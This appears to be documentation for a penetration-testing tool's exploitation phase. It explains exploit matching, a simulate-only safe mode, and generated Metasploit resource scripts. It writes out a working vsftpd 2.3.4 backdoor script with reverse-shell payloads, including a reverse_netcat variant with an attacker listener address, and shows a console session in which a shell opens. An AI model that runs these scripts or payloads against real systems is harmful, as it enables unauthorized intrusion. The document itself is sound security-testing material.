AutoPentestX includes an intelligent exploitation engine that matches discovered vulnerabilities with known exploits and generates Metasploit resource scripts for manual testing.
Safe Mode is ALWAYS enabled by default. AutoPentestX simulates exploitation attempts but never executes actual exploits to prevent system damage.
How Exploit Matching Works The exploit engine analyzes vulnerabilities from two sources:
Service-based matching : Vulnerable service versions detected by NmapCVE-based matching : Known CVEs from the intelligence database
Exploitation Phases
Vulnerability Input
The engine receives vulnerability data from Phase 3 and Phase 4: # From main.py:264-268 matched_exploits = exploit_engine.match_exploits( self .vuln_results.get( 'vulnerabilities' , []), self .cve_results )
Exploit Database Lookup
Vulnerabilities are matched against the internal exploit database: # From modules/exploit_engine.py:22-53 self .exploit_db = { 'vsftpd 2.3.4' : { 'name' : 'vsftpd_234_backdoor' , 'module' : 'exploit/unix/ftp/vsftpd_234_backdoor' , 'description' : 'VSFTPD v2.3.4 Backdoor Command Execution' , 'safe' : True }, 'EternalBlue' : { 'name' : 'ms17_010_eternalblue' , 'module' : 'exploit/windows/smb/ms17_010_eternalblue' , 'description' : 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption' , 'safe' : False # Potentially destructive } # ... more exploits }
Confidence Scoring
Each match receives a confidence level:
HIGH : Exact service version matchMEDIUM : CVE-based matchLOW : Generic service match
Safe Mode Check
Before simulation, the engine verifies each exploit’s safety rating: # From modules/exploit_engine.py:211-219 if not exploit.get( 'safe' , False ) and self .safe_mode: print ( f "[!] Skipping potentially dangerous exploit: { exploit[ 'name' ] } " ) result = { 'status' : 'SKIPPED' , 'reason' : 'Exploit marked as potentially destructive' }
Simulation & RC Script Generation
For safe exploits, Metasploit resource scripts are generated: [✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_21_20240311_143022.rc
Built-in Exploit Database AutoPentestX includes exploits for common vulnerabilities:
FTP Exploits
SMB Exploits
Web Exploits
VSFTPD 2.3.4 Backdoor Metasploit Module: exploit/unix/ftp/vsftpd_234_backdoorDescription: VSFTPD version 2.3.4 contains a backdoor allowing remote code execution.Trigger Conditions:
Service: ftp
Version: vsftpd 2.3.4
Safety Rating: ✅ Safe (opens a shell but doesn’t crash the service)ProFTPD 1.3.3c Backdoor Metasploit Module: exploit/unix/ftp/proftpd_133c_backdoorDescription: ProFTPD 1.3.3c backdoor allows remote command execution.Trigger Conditions:
Service: ftp
Version: proftpd 1.3.3
Safety Rating: ✅ SafeEternalBlue (MS17-010) Metasploit Module: exploit/windows/smb/ms17_010_eternalblueCVE: CVE-2017-0144Description: Remote code execution in Windows SMB server (WannaCry vulnerability).Trigger Conditions:
CVE-2017-0144 detected
Port 445 (SMB) open
Windows operating system
Safety Rating: ⚠️ Potentially Destructive (can crash systems)EternalBlue is automatically SKIPPED in safe mode because it may cause system crashes.
Shellshock (Bash Environment Variable) Metasploit Module: exploit/multi/http/apache_mod_cgi_bash_env_execCVE: CVE-2014-6271Description: Remote code execution through bash environment variable injection.Trigger Conditions:
CVE-2014-6271 detected
Apache with mod_cgi detected
Safety Rating: ✅ SafeDrupalgeddon2 Metasploit Module: exploit/unix/webapp/drupal_drupalgeddon2CVE: CVE-2018-7600Description: Drupal remote code execution via form API.Trigger Conditions:
CVE-2018-7600 detected
Drupal CMS identified
Safety Rating: ✅ SafeConsole Output Interpretation Phase 6: Exploitation Assessment ╔══════════════════════════════════════════════════════════════════╗ ║ [PHASE 6] ▶ Exploit simulation [SAFE MODE]... ║ ╚══════════════════════════════════════════════════════════════════╝ ────────────────────────────────────────────────────────────────── [✓] Metasploit Framework detected ============================================================ AutoPentestX - Exploit Matching ============================================================ [✓] Exploit matched: vsftpd_234_backdoor for port 21 [✓] Exploit matched: ms17_010_eternalblue for CVE CVE-2017-0144 [*] Total exploits matched: 2 ============================================================ AutoPentestX - Exploitation Simulation ============================================================ Safe Mode: ENABLED Target: 192.168.1.100 ============================================================ [*] Running in SAFE MODE - No actual exploitation will occur [*] Generating exploit feasibility reports... [*] Simulating exploit: exploit/unix/ftp/vsftpd_234_backdoor Target: 192.168.1.100:21 Payload: generic/shell_reverse_tcp [✓] Metasploit RC script saved: exploits/exploit_192.168.1.100_21_20240311_143022.rc [*] Port 21: vsftpd_234_backdoor - SIMULATED [!] Skipping potentially dangerous exploit: ms17_010_eternalblue [*] Port 445: ms17_010_eternalblue - SKIPPED ============================================================ EXPLOITATION SUMMARY ============================================================ Exploits matched: 2 Exploits simulated: 2 Safe mode: ENABLED ============================================================ [i] Note: All exploitation was simulated only. [i] RC scripts generated for manual testing if needed.
Status Meanings Exploit was deemed safe and an RC script was generated. You can manually test this exploit using Metasploit.
Exploit was flagged as potentially destructive and was not simulated, even in safe mode.
Safe mode prevented execution (this status appears if --no-safe-mode is used, but exploitation is still blocked).
RC scripts are saved to the exploits/ directory and can be used for manual exploitation.
RC Script Structure exploits/exploit_192.168.1.100_21_20240311_143022.rc
# Metasploit Resource Script # Generated by AutoPentestX # Target: 192.168.1.100:21 # Date: 2026-03-11 14:30:22 use exploit / unix / ftp / vsftpd_234_backdoor set RHOSTS 192.168 . 1.100 set RPORT 21 set PAYLOAD generic / shell_reverse_tcp set LHOST 0.0 . 0.0 set LPORT 4444 check # Exploit execution disabled in safe mode # Uncomment to execute: exploit
Load the RC Script
Use the resource command to load the script: msf6 > resource exploits/exploit_192.168.1.100_21_20240311_143022.rc
The script will:
Load the exploit module
Configure all parameters
Run the check command to verify exploitability
Review Check Results
Metasploit’s check command tests if the target is vulnerable: [*] 192.168.1.100:21 - The target appears to be vulnerable.
or [*] 192.168.1.100:21 - The target is not exploitable.
Manual Exploitation (Optional)
If you have authorization and want to proceed: msf6 exploit ( unix/ftp/vsftpd_234_backdoor ) > exploit [ * ] 192.168.1.100:21 - Banner: 220 ( vsFTPd 2.3.4 ) [ * ] 192.168.1.100:21 - Sending malicious packet... [ * ] Command shell session 1 opened
Only execute exploits with explicit written authorization. Exploitation can crash services or damage systems.
Customizing RC Scripts You can edit RC scripts before running them:
# Change the listening port set LPORT 8888 # Use a different payload set PAYLOAD cmd / unix / reverse_netcat # Set your attacker IP set LHOST 10.0 . 0.5 # Add exploit options set VERBOSE true exploit
Safe Mode vs No-Safe-Mode Default Behavior (Safe Mode) python3 main.py -t 192.168.1.100
What Happens:
✅ Identifies exploitable vulnerabilities
✅ Matches exploits from database
✅ Generates Metasploit RC scripts
✅ Runs check command simulation
❌ Does NOT execute exploits
❌ Does NOT modify target system
❌ Does NOT open reverse shells
Output: [*] Running in SAFE MODE - No actual exploitation will occur [*] Simulating exploit: exploit/unix/ftp/vsftpd_234_backdoor Target: 192.168.1.100:21 Payload: generic/shell_reverse_tcp [✓] Metasploit RC script saved
Disabling Safe Mode python3 main.py -t 192.168.1.100 --no-safe-mode
Currently Blocked : Even with --no-safe-mode, actual exploitation is disabled in the code for safety. This is an intentional design decision.
What Would Happen (if enabled):
⚠️ Could execute actual exploits
⚠️ May crash services
⚠️ Could damage target systems
⚠️ Might trigger IDS/IPS alerts
⚠️ Legal liability if unauthorized
Code Protection: From modules/exploit_engine.py:127-132:
if not self .safe_mode: print ( "[!] WARNING: Safe mode disabled - This could cause system damage!" ) return { 'status' : 'BLOCKED' , 'reason' : 'Exploitation disabled for safety' }
Skipping Exploitation Phase Use --skip-exploit to disable the entire exploitation phase:
python3 main.py -t 192.168.1.100 --skip-exploit
Impact:
Phase 6 is skipped entirely
No exploit matching occurs
No RC scripts are generated
Reduces scan time by 2-5 minutes
Report shows 0 exploitation attempts
Console Output: [PHASE 6] Exploitation assessment... [SKIPPED BY OPERATOR]
When to Skip:
✅ Pure vulnerability discovery
✅ Compliance scanning
✅ Time-constrained assessments
✅ When Metasploit is not installed
Exploitation in PDF Report The report includes an “EXPLOITATION ASSESSMENT” section:
Section Content EXPLOITATION ASSESSMENT The following exploitation scenarios were evaluated in SAFE MODE. No actual exploitation was performed to prevent system damage. Total Exploits Identified: 2 • Port 21: vsftpd_234_backdoor Status: SIMULATED Description: VSFTPD v2.3.4 Backdoor Command Execution • Port 445: ms17_010_eternalblue Status: SKIPPED Description: MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption Reason: Exploit marked as potentially destructive
Interpreting Results
Meaning: Exploit is available and an RC script was generated.Action Items:
Review the RC script in exploits/ directory
Test in a lab environment first
If authorized, manually execute using Metasploit
Document findings
Meaning: Exploit exists but is flagged as dangerous.Action Items:
Investigate the CVE manually
Check vendor patches
Test in an isolated lab only
Do NOT attempt on production systems
Meaning: No known exploits for detected vulnerabilities.Action Items:
Vulnerabilities still exist (lack of exploit ≠ lack of risk)
Review CVE details for manual testing approaches
Check vendor advisories
Apply patches based on vulnerability severity
After AutoPentestX generates RC scripts, follow this workflow for manual testing:
Step 1: List Generated Scripts
Step 2: Review Script Content
Step 3: Start Metasploit
Step 4: Load Script
Step 5: Verify Configuration
Step 6: Check Exploitability
Step 7: Execute (if authorized)
Database Storage Exploit attempts are stored in the database:
CREATE TABLE exploits ( id INTEGER PRIMARY KEY , scan_id INTEGER , vulnerability_id INTEGER , name TEXT , status TEXT , -- 'SIMULATED', 'SKIPPED', 'BLOCKED' result TEXT , -- JSON with details created_at TIMESTAMP );
Query Exploitation Data sqlite3 database/autopentestx.db \ "SELECT name, status FROM exploits WHERE scan_id = 1;"
Best Practices
Always Get Authorization Never attempt exploitation without explicit written permission, even in safe mode.
Test in Labs First Use Metasploitable, DVWA, or other vulnerable VMs for practice before testing real systems.
Keep Safe Mode Enabled Only disable safe mode if you’re an expert and have proper authorization.
Document Everything Keep detailed records of all exploitation attempts and results for legal protection.
Next Steps
Report Analysis Learn how to interpret and act on PDF report findings
API Reference Complete CLI flag reference and examples